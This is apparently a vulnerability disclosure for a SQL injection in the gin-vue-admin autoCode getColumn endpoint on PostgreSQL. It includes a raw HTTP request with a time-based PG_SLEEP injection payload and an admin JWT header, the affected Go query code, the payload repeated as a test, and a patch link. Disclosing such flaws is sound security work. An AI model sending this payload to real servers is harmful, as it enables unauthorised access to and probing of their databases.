GET /autoCode/getColumn?tableName=123'%20AND%201178%3D(SELECT%201178%20FROM%20PG_SLEEP(5))%20AND%20'obSz'%3D'obSz HTTP/1.1
Host: 192.168.68.168:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
x-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNjJkMDNjZjgtZmIxOC00NGQ4LThhOWEtZDQwYjgyY2EyOTM4IiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Iui2hee6p-euoeeQhuWRmCIsIkF1dGhvcml0eUlkIjoiODg4IiwiQnVmZmVyVGltZSI6ODY0MDAsImV4cCI6MTY1MDM1MzM3OSwiaXNzIjoicW1QbHVzIiwibmJmIjoxNjQ5NzQ3NTc5fQ.SdRKIBiwwyq8Ye7O8lpvQpofnIShG9AvaEMDK29FaRM
// change this method
// GetColumn 获取指定数据库和指定数据表的所有字段名,类型值等
// Author [piexlmax](https://github.com/piexlmax)
// Author [SliverHorn](https://github.com/SliverHorn)
func (a *autoCodePgsql) GetColumn(tableName string, dbName string) (data []response.Column, err error) {
// todo 数据获取不全, 待完善sql
sql := `
SELECT columns.COLUMN_NAME as column_name,
columns.DATA_TYPE as data_type,
CASE
columns.DATA_TYPE
WHEN 'text' THEN
concat_ws('', '', columns.CHARACTER_MAXIMUM_LENGTH)
WHEN 'varchar' THEN
concat_ws('', '', columns.CHARACTER_MAXIMUM_LENGTH)
WHEN 'smallint' THEN
concat_ws(',', columns.NUMERIC_PRECISION, columns.NUMERIC_SCALE)
WHEN 'decimal' THEN
concat_ws(',', columns.NUMERIC_PRECISION, columns.NUMERIC_SCALE)
WHEN 'integer' THEN
concat_ws('', '', columns.NUMERIC_PRECISION)
WHEN 'bigint' THEN
concat_ws('', '', columns.NUMERIC_PRECISION)
ELSE ''
END AS data_type_long,
(select description.description
from pg_description description
where description.objoid = (select attribute.attrelid
from pg_attribute attribute
where attribute.attrelid =
(select oid from pg_class class where class.relname = '@table_name') and attname =columns.COLUMN_NAME )
and description.objsubid = (select attribute.attnum
from pg_attribute attribute
where attribute.attrelid =
(select oid from pg_class class where class.relname = '@table_name') and attname =columns.COLUMN_NAME )) as column_comment
FROM INFORMATION_SCHEMA.COLUMNS columns
WHERE table_catalog = '?'
and table_schema = 'public'
and table_name = '?';
`
var entities []response.Column
db, _err := gorm.Open(postgres.Open(global.GVA_CONFIG.Pgsql.LinkDsn(dbName)), &gorm.Config{Logger: logger.Default.LogMode(logger.Info)})
if _err != nil {
return nil, errors.Wrapf(err, "[pgsql] 连接 数据库(%s)的表(%s)失败!", dbName, tableName)
}
err = db.Raw(sql, dbName, tableName).Scan(&entities).Error
return entities, err
}
condition:
The problem occurs in the following code in
server/service/system/sys_auto_code_pgsql.go, which means that PostgreSQL must be used as the database for this vulnerability to occur.Simple test payload:
http://127.0.0.1:8888/autoCode/getColumn?tableName=123' AND 1178=(SELECT 1178 FROM PG_SLEEP(5)) AND 'obSz'='obSzPOC:
Patches:
https://github.com/flipped-aurora/gin-vue-admin/blob/main/server/service/system/sys_auto_code_pgsql.go